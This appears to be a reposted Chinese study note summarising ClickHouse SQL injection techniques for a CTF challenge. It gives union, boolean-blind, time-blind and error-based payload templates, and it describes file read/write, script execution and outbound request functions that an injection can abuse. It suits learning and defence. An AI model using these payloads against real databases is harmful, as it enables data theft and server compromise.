clickhouse注入手法总结

clickhouse注入手法总结

news2025/4/15 0:52:24

clickhouse

遇到一题clickhouse注入相关的，没有见过，于是来学习clickhouse的使用，并总结相关注入手法。

环境搭建

直接在docker运行

docker pull clickhouse/clickhouse-server

docker run -d --name some-clickhouse-server --ulimit nofile=262144:262144 clickhouse/clickhouse-server

基础sql语句

列出数据库

show databases;

列出表

show tables;

查看表结构

desc system.databases;

select name,database,data_path from system.databases;

建表语句

CREATE DATABASE IF NOT EXISTS helloworld;

CREATE TABLE helloworld.my_first_table
(
user_id UInt32,
message String,
timestamp DateTime,
metric Float32
)
ENGINE = MergeTree()
PRIMARY KEY (user_id, timestamp)

插入数据

INSERT INTO helloworld.my_first_table (user_id, message, timestamp, metric) VALUES
(101, 'Hello, ClickHouse!', now(), -1.0 ),
(102, 'Insert a lot of rows per batch', yesterday(), 1.41421 ),
(102, 'Sort your data based on your commonly-used queries', today(), 2.718 ),
(101, 'Granules are the smallest chunks of data read', now() + 5, 3.14159 )

system 数据库

这个数据库存储了数据库信息、表信息、字段信息

select name,table,database from system.tables where database=database();

select name,table from system.columns where table='my_first_table';

infomation_schema 数据库

这个数据库也是存储了数据库、表、字段信息

查表

查列

常规函数

常规函数就是产生一个值的函数

字符串拼接

concatWithSeparator(sep, expr1, expr2, expr3...);

字符串切割

select substring('abcdef',2,3);

字符串比较

select startsWith(str, prefix)

select endsWith(str, suffix)

编码

select ascii('a')

select char(97)

select base64Encode('clickhouse')

select base64Decode('Y2xpY2tob3VzZQ==')

sleep

当sleep参数大于3时，不运行，直接报错

聚合函数

字段拼接

select groupArray(message) from my_first_table

groupArray的返回结果是数组，不能直接与字符串类型进行union操作

select groupArray(message) from my_first_table union all select '123';

得先把数组转换成字符串，才能进行union

select arrayStringConcat(groupArray(message),',') from my_first_table;

表函数

表函数就是接在from后面的，返回的结果作为一张表，能够被查询

执行脚本文件

在/var/lib/clickhouse/user_scripts/这个目录下创建脚本文件：

python
#!/usr/bin/python3
import sys
import string
import random

def main():
# Read input value
for number in sys.stdin:
i = int(number)

# Generate some random rows
for id in range(0, i):
letters = string.ascii_letters
random_string = ''.join(random.choices(letters ,k=10))
print(str(id) + '\t' + random_string + '\n', end='')

# Flush results to stdout
sys.stdout.flush()

if __name__ == "__main__":
main()

执行sql语句：SELECT * FROM executable('1.py', TabSeparated, 'id UInt32, random String', (SELECT 10))

其中TabSeparated表示脚本文件的输出每行以\t符号分隔，用于解析结果，可以换成TSV

如果脚本文件的输出以逗号结尾，那么就写CSV

最后一个参数要传入一个query语句，结果会被传入脚本文件的标准输入

用什么解释器执行脚本，取决于文件开头的注释#!/

当尝试跨目录执行文件时，报错：

文件读取

按照一定的格式读取文件，要求文件的路径在user_files下

语法：

file([path_to_archive ::] path [,format] [,structure] [,compression])

例如文件内容为：

java
1,2,3
3,2,1
1,3,2

查询sql语句：SELECT * FROM file('1.txt', 'CSV', 'column1 UInt32, column2 UInt32, column3 UInt32');

写文件

没有别的限制，任意位置都可写

select 1,2,3 union all select 123,4556,789 into outfile '/tmp/1.txt';

发起网络请求

SELECT * FROM url('http://127.0.0.1:12345/', CSV, 'column1 String, column2 UInt32', headers('Accept'='text/csv; charset=utf-8'));

其他

除了上述表函数，还能够发起mysql连接，jdbc连接，redis连接，详细可以查阅文档。总之功能十分多样

注入手法

获取表名：

select arrayStringConcat(groupArray(name),',') from system.tables where database=database()

select arrayStringConcat(groupArray(table),',') from system.tables where database=database()

select arrayStringConcat(groupArray(table_schema),',') from information_schema.tables where table_schema=database()

获取列名

select arrayStringConcat(groupArray(name),',') from system.columns where table='your_table'

select arrayStringConcat(groupArray(column_name),',') from information_schema.tables where table_name='your_table'

联合注入

要点：

1. 不能写union select，应该写union all select 或者union distinct select

2. 两个查询对应的列的数据类型要相同

布尔盲注

和mysql差不多，就是注意一下有哪些函数可以互相平替的，比如字符串截取，编码等函数，方便绕过对特定函数的过滤。

ascii(substr('xxx',0,1))=97

if(ascii(substr('xxx',0,1)) = 97,0,1)

时间盲注

if(ascii(substr('xxx',0,1)) = 97,0,sleep(1))

可以执行其他耗时的查询代替sleep：

报错注入

select 1 where 1=CAST((select database()) as UInt32)

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2334197.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

React 组件样式

React 组件样式

在这里插入图片描述分为行内和css文件控制行内通过CSS中类名文件控制

阅读更多...

利用 pyecharts 实现地图的数据可视化——第七次人口普查数据的2d、3d展示（关键词：2d 、3d 、map、 geo、涟漪点）

利用 pyecharts 实现地图的数据可视化——第七次人口普查数据的2d、3d展示（关键词：2d 、3d 、map、 geo、涟漪点）

参考文档：链接: link_pyecharts 官方文档 1、map() 传入省份全称，date_pair 是列表套列表 [ [ ],[ ] … ] 2、geo() 传入省份简称，date_pair 是列表套元组 [ ( ),( ) … ] 1、准备数据 population_data：简称经纬度 population_da…

阅读更多...

解决 Elasticsearch 分页查询性能瓶颈——从10分钟到秒级的优化实践

解决 Elasticsearch 分页查询性能瓶颈——从10分钟到秒级的优化实践

大家好，我是铭毅天下，一名专注于 Elasticsearch （以下简称ES）技术栈的技术爱好者。今天我们来聊聊球友提出的一个实际问题： ES分页查询性能很差，使用from/size方式检索居然需要10分钟！ 这是一个…

阅读更多...

记录IBM服务器检测到备份GPT损坏警告排查解决过程

记录IBM服务器检测到备份GPT损坏警告排查解决过程

服务器设备：IBM x3550 M4 Server IMM默认IP地址：192.168.70.125 用户名：USERID 密码：PASSW0RD（注意是零0） 操作系统：Windows Hyper-V Server 2016 IMM Web System Status Warning&#xff1…

阅读更多...

毫米波测试套装速递！高效赋能5G/6G、新材料及智能超表面（RIS）研发

毫米波测试套装速递！高效赋能5G/6G、新材料及智能超表面（RIS）研发

德思特（Tesight）作为全球领先的测试测量解决方案提供商，始终致力于为前沿技术研发提供高精度、高效率的测试工具。针对毫米波技术在高频通信、智能超表面（RIS）、新材料等领域的快速应用需求，我们推出毫米…

阅读更多...

Linux中卸载宝塔面板

Linux中卸载宝塔面板

输入命令 wget http://download.bt.cn/install/bt-uninstall.sh 执行脚本命令 sh bt-uninstall.sh 根据自己的情况选择1还是2 卸载完成校验 bt 这样我们的宝塔面板就卸载完了

阅读更多...

无人机的振动与噪声控制技术！

无人机的振动与噪声控制技术！

一、振动控制技术要点 1. 振动源分析气动振动：旋翼桨叶涡脱落（如叶尖涡干涉）、动态失速（Dynamic Stall）引发的周期性气动激振力（频率与转速相关）。机械振动：电机偏心、传动轴不…

阅读更多...

【蓝桥杯】第十六届蓝桥杯 JAVA B组记录

【蓝桥杯】第十六届蓝桥杯 JAVA B组记录

试题 A: 逃离高塔很简单，签到题，但是需要注意精度，用int会有溢出风险答案：202 package lanqiao.t1;import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.PrintWrit…

阅读更多...

OSPF的接口网络类型【复习篇】

OSPF的接口网络类型【复习篇】

OSPF在不同网络环境下默认的不同工作方式 [a3]display ospf interface g 0/0/0 # 查看ospf接口的网络类型网络类型OSPF接口的网络类型（工作方式）计时器BMA（以太网）broadcast ，需要DR/BDR的选举hello：10s…

阅读更多...

python+requests接口自动化测试框架实例教程

python+requests接口自动化测试框架实例教程

🍅 点击文末小卡片 ，免费获取软件测试全套资料，资料在手，涨薪更快前段时间由于公司测试方向的转型，由原来的web页面功能测试转变成接口测试，之前大多都是手工进行，利用postman和jmeter进行…

阅读更多...

$2021第十二届蓝桥杯大赛软件赛省赛C/C++ 大学 B 组$

2021第十二届蓝桥杯大赛软件赛省赛C/C++ 大学 B 组

记录刷题的过程、感悟、题解。希望能帮到，那些与我一同前行的，来自远方的朋友😉 大纲： 1、空间-（题解）-字节单位转换 2、卡片-（题解）-可以不用当组合来写，思维题 3、直…

阅读更多...

智能资源管理机制-重传机制

智能资源管理机制-重传机制

一、发送端资源管理的核心机制 1. 滑动窗口（Sliding Window） 这是TCP协议的核心优化设计： 窗口动态滑动：发送端不需要保留所有已发送的分组，只需维护一个"发送窗口"窗口大小：由接收方通告的接…

阅读更多...

设计模式 --- 原型模式

设计模式 --- 原型模式

原型模式是创建型模式的一种，是在一个原型的基础上，建立一致的复制对象的方式。这个原型通常是我们在应用程序生命周期中需要创建多次的一个典型对象。为了避免初始化新对象潜在的性能开销，我们可以使用原型模式来建立一个非常类似于复印机的…

阅读更多...

汽车软件开发常用的建模工具汇总

汽车软件开发常用的建模工具汇总

目录往期推荐 1.Enterprise Architect（EA） 2.MATLAB/Simulink 3.TargetLink 4.Rational Rhapsody 5.AUTOSAR Builder 6.PREEvision 总结往期推荐 2025汽车行业新宠：欧企都在用的工具软件ETAS工具链自动化实战指南＜一&am…

阅读更多...

SSM废品买卖回收管理系统的设计与实现

SSM废品买卖回收管理系统的设计与实现

🍅点赞收藏关注 → 添加文档最下方联系方式咨询本源代码、数据库🍅 本人在Java毕业设计领域有多年的经验，陆续会更新更多优质的Java实战项目希望你能有所收获，少走一些弯路。🍅关注我不迷路🍅 项目视频 07…

阅读更多...

@SchedulerLock 防止分布式环境下定时任务并发执行

@SchedulerLock 防止分布式环境下定时任务并发执行

背景在一个有多个服务实例的分布式系统中，如果你用 Scheduled 来定义定时任务，所有实例都会执行这个任务。ShedLock 的目标是只让一个实例在某一时刻执行这个定时任务。使用步骤引入依赖当前以redisTemplate为例子，MongoDB、Zookeeper…

阅读更多...

实信号的傅里叶变换为何属于埃尔米特函数？从数学原理到 MATLAB 动态演示

实信号的傅里叶变换为何属于埃尔米特函数？从数学原理到 MATLAB 动态演示

引言在信号处理领域，傅里叶变换是分析信号在频域表现的重要工具。特别是对于实信号，实信号是指在时间或空间域内取值为实数的信号，例如音频信号、温度变化等，它的傅里叶变换展现了一个非常特殊的数学性质——共轭对称性&#xf…

阅读更多...

【VitePress】新增md文件后自动更新侧边栏导航

【VitePress】新增md文件后自动更新侧边栏导航

目录说在前面先看效果代码结构详细说明侧边栏格式utils监听文件变化使用pm2管理监听进程说在前面操作系统：windows11node版本：v18.19.0npm版本：10.2.3vitepress版本：1.6.3完整代码：github 先看效果模板用的就是官…

阅读更多...

docker部署scylladb

docker部署scylladb

创建存储数据的目录和配置目录 mkdir -p /root/docker/scylla/data/data /root/docker/scylla/data/commitlog /root/docker/scylla/data/hints /root/docker/scylla/data/view_hints /root/docker/scylla/conf快速启动拷贝配置文件 docker run -d \--name scylla \scylladb/…

阅读更多...

Android 16应用适配指南

Android 16应用适配指南

Android 16版本特性介绍 https://developer.android.com/about/versions/16?hlzh-cn Android 16 所有功能和 API 概览 https://developer.android.com/about/versions/16/features?hlzh-cn#language-switching Android 16 发布时间 Android 16 适配指南 Google开发平台&…

阅读更多...

推荐文章

最新文章